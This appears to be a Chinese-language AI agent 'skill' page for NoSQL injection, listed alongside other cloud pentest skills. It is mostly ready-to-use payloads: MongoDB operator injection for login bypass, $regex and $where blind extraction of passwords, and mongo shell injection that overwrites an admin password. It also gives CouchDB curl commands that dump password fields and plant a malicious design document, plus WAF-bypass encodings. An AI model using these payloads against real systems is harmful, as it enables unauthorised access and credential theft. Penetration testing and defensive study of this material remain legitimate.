菜单
NoSQL 注入检测与利用。当目标使用 MongoDB/CouchDB 等 NoSQL 数据库、登录表单使用 JSON body 提交、或参数中出现 $gt/$ne/$regex 等操作符时使用。覆盖操作符注入认证绕过、$regex 盲注数据提取、$where JS 注入、CouchDB 攻击、WAF 绕过
用 Codex 或 Claude 帮你安装 复制这段 Prompt,粘贴到 Codex、Claude 或其他助手里,让它检查 Skill 页面并帮你完成安装。
基于 SOC 职业分类
Azure 云环境渗透测试总体方法论。当目标使用 Azure/Microsoft 365/Entra ID、发现 Azure 相关资产(Blob Storage/App Service/Azure VM/Azure Functions)、获取 Azure 凭据(Service Principal/Managed Identity/Access Token)、或需要对 Azure 环境进行安全评估时使用。提供从未授权枚举到 Entra ID 攻击、服务提权、Cloud-to-OnPrem 横向移动的全流程决策树。覆盖 35+ Azure 服务攻击面
GCP 云环境攻击方法论。当目标使用 Google Cloud Platform、发现 GCP Service Account/Metadata/Storage Bucket 时使用。覆盖 Metadata 服务利用、Service Account 密钥窃取、IAM 提权、GKE 逃逸、Storage Bucket 枚举
GCP 云环境渗透测试总体方法论。当目标使用 Google Cloud Platform、发现 GCP 相关资产(GCS Bucket/Compute Engine/Cloud Functions/GKE)、获取 GCP 凭据(Service Account Key/OAuth Token/Metadata Token)、或需要对 GCP 环境进行安全评估时使用。提供从未授权枚举到提权、后渗透、GCP-to-Workspace 穿越的全流程决策树。覆盖 37+ GCP 服务攻击面
Serverless/云函数安全测试与攻击。当目标涉及 AWS Lambda、腾讯云 SCF、阿里云 FC、Azure Functions 等 Serverless 服务时使用。当发现 API Gateway 后端是 Lambda/SCF 触发、通过 cloud-aksk-exploit 获取到函数操作权限、或需要分析云函数代码中的漏洞时使用。覆盖事件注入(HTTP/OSS/消息队列触发器参数篡改)、环境变量泄露(硬编码凭据提取)、函数代码注入/覆盖(UpdateFunctionCode)、Runtime 利用(/tmp 写入/Layer 劫持/依赖投毒)、临时凭据滥用。发现任何 Lambda/SCF/云函数、API Gateway、或 Serverless 架构时都应使用此 skill
腾讯云渗透测试方法论。当目标使用腾讯云服务、发现 cos.*.myqcloud.com 资产、获取腾讯云 SecretId/SecretKey、在 CVM 实例内可访问 metadata.tencentyun.com 元数据、或需要对腾讯云 CAM/CVM/COS/TencentDB/TKE/SCF 等服务进行安全评估时使用。覆盖 CAM 提权、CVM 接管、COS 对象存储利用、TencentDB 数据库攻击、TKE 容器集群、SCF 云函数、CLB 负载均衡、CLS 日志服务、KMS 密钥管理
Java 源码注入类漏洞审计。当在 Java 白盒审计中需要检测注入类漏洞时触发。 覆盖 6 种注入: SQL 注入(JDBC/MyBatis/Hibernate/JPA)、命令注入(Runtime.exec/ProcessBuilder)、 SSRF(HttpURLConnection/OkHttp/RestTemplate)、LDAP 注入、SpEL/OGNL 表达式注入、NoSQL 注入(MongoDB)。 需要 java-audit-pipeline 提供的数据流证据(EVID_*)作为审计输入。
| name | nosql-injection |
| description | NoSQL 注入检测与利用。当目标使用 MongoDB/CouchDB 等 NoSQL 数据库、登录表单使用 JSON body 提交、或参数中出现 $gt/$ne/$regex 等操作符时使用。覆盖操作符注入认证绕过、$regex 盲注数据提取、$where JS 注入、CouchDB 攻击、WAF 绕过 |
| metadata | {"tags":"nosql,mongodb,couchdb,injection,nosql injection,NoSQL注入,$gt,$ne,$regex,$where,认证绕过,数据提取,operator injection,express,node,json body,login bypass,登录绕过,mongo,pymongo,mongoose,application/json","category":"exploit"} |
NoSQL 数据库(MongoDB 为主)使用结构化查询对象而非 SQL 字符串,但这不意味着安全——当应用直接将用户输入拼接到查询对象中时,攻击者可以注入查询操作符来改变查询逻辑。
| 信号 | 判断 |
|---|---|
JSON 格式的登录请求 (Content-Type: application/json) | 高概率 MongoDB 后端 |
| Node.js / Express 技术栈 | MongoDB 是 Node.js 最常见的数据库 |
错误信息含 MongoError、CastError、BSONTypeError | 确认 MongoDB |
URL 中有 mongodb:// 连接字符串 | 确认 MongoDB |
| Python Flask + PyMongo / Mongoose ODM | 确认 MongoDB |
参数值接受对象/数组(如 user[$ne]=x) | 操作符注入可能 |
CouchDB /_all_docs、/_find 端点 | CouchDB 注入 |
NoSQL 注入最常见的利用场景是绕过登录认证。
核心思想:将 {"username": "admin", "password": "xxx"} 变为 {"username": "admin", "password": {"$ne": ""}},使密码校验永远为真。
JSON 格式(Content-Type: application/json):
{"username": "admin", "password": {"$ne": ""}}
{"username": "admin", "password": {"$gt": ""}}
{"username": {"$ne": ""}, "password": {"$ne": ""}}
{"username": {"$regex": "^admin"}, "password": {"$ne": ""}}
URL 编码格式(Content-Type: application/x-www-form-urlencoded):
username=admin&password[$ne]=
username[$ne]=invalid&password[$ne]=invalid
username=admin&password[$gt]=
username[$regex]=^adm&password[$ne]=
为什么两种格式都要试:Express 的
qs中间件会自动将user[$ne]解析为{user: {$ne: ""}},但有些应用只接受 JSON,有些只接受 URL 编码。两种都试才能确保不漏。
1. 正常登录请求 → 记录失败响应(状态码/长度/内容)
2. 替换 password 为 {"$ne": ""} → 对比响应差异
3. 如果 JSON 不行,换 URL 编码: password[$ne]=
4. 如果 $ne 不行,试 $gt、$gte、$exists:true
5. 绕过用户名: username={"$regex": ".*"} 配合 password={"$ne": ""}
{"username": {"$regex": "^a"}, "password": {"$ne": ""}}
{"username": {"$regex": "^ad"}, "password": {"$ne": ""}}
{"username": {"$regex": "^adm"}, "password": {"$ne": ""}}
逐字符递增,根据响应差异判断用户名是否匹配。
当注入点不在登录场景,或需要提取具体字段值时。
原理:通过正则逐字符猜测字段值,根据响应差异(true/false、200/401、内容长度)判断字符是否正确。
{"username": "admin", "password": {"$regex": "^a"}}
{"username": "admin", "password": {"$regex": "^ab"}}
{"username": "admin", "password": {"$regex": "^abc"}}
自动化脚本模板 → 读 references/nosql-payloads.md
$where 操作符允许在查询中执行任意 JavaScript(MongoDB 4.x 及以下):
{"$where": "this.username == 'admin' && this.password.match(/^a.*/)"}
条件判断(盲注 oracle):
{"$where": "function(){return this.password.length > 5}"}
{"$where": "function(){return this.password[0] == 'a'}"}
时间盲注:
{"$where": "function(){if(this.password.match(/^a.*/)){sleep(3000);return true;}return false;}"}
$where依赖服务端 JavaScript 是否启用;可通过--noscripting或security.javascriptEnabled: false禁用。MongoDB 8.0 起服务端 JavaScript(含$where)被 deprecated,但 5.x/6.x/7.x 不应默认视为不可用。
如果注入点在聚合管道参数中:
[{"$lookup": {"from": "users", "localField": "_id", "foreignField": "_id", "as": "leaked"}}]
某些应用会用 ObjectId 的时间戳部分来生成信息:
ObjectId("507f1f77bcf86cd799439011")
↓ 前 8 位 hex = Unix 时间戳
507f1f77 → 2012-10-17T21:02:31Z
当输入被直接拼接到 mongo shell 命令中(罕见但致命):
'; db.users.find().forEach(printjson); var x='
'; db.users.update({username:"admin"},{$set:{password:"hacked"}}); var x='
CouchDB 使用 REST API,注入方式不同:
# 未授权访问检测
curl http://TARGET:5984/_all_dbs
# Mango 查询注入(/_find 端点)
curl -X POST http://TARGET:5984/dbname/_find \
-H "Content-Type: application/json" \
-d '{"selector":{"password":{"$gt":null}},"fields":["_id","username","password"]}'
# 篡改 design document(需要 admin):改变 view 输出或隐藏/污染查询结果
curl -X PUT http://TARGET:5984/testdb/_design/exploit \
-H "Content-Type: application/json" \
-d '{"views":{"leak":{"map":"function(doc){ if (doc.password) emit(doc._id, doc.password); }"}}}'
某些 WAF 只检查字符串中的 $ 符号:
// 原始
{"password": {"$ne": ""}}
// Unicode 绕过
{"password": {"\u0024ne": ""}}
// 深层嵌套
{"password": {"$not": {"$eq": "wrong_password"}}}
如果 WAF 只检查 JSON 格式:
Content-Type: application/x-www-form-urlencoded
password[$ne]=&username=admin
反之,如果 WAF 只检查 URL 参数:
Content-Type: application/json
{"password": {"$ne": ""}}
{"$ne": "x"} // 不等于
{"$gt": ""} // 大于空字符串
{"$gte": " "} // 大于等于空格
{"$exists": true} // 字段存在
{"$in": ["admin"]} // 在列表中
{"$nin": [""]} // 不在列表中
{"$not": {"$eq": "wrong"}} // 双重否定
| 工具 | 用途 | 命令 |
|---|---|---|
| NoSQLMap | 自动化 NoSQL 注入 | python nosqlmap.py -u http://TARGET/login -p username,password |
| mongosh | 直接连接测试 | mongosh mongodb://TARGET:27017 |
| Burp Intruder | 操作符 fuzz | 用 payload 列表逐个测试操作符 |
发现登录页面 + JSON 请求
├── 试 {"password":{"$ne":""}} → 成功?→ 认证绕过 ✅
├── 试 password[$ne]= (URL编码) → 成功?→ 认证绕过 ✅
├── 两种都失败
│ ├── 检查是否有 WAF → Phase 4 绕过
│ ├── 检查是否 MongoDB → 错误信息/指纹
│ └── 不是 NoSQL → 尝试 SQL 注入
└── 需要提取数据
├── $regex 盲注 → Phase 2.1
├── $where JS 注入 → Phase 2.2
└── 聚合管道 → Phase 2.3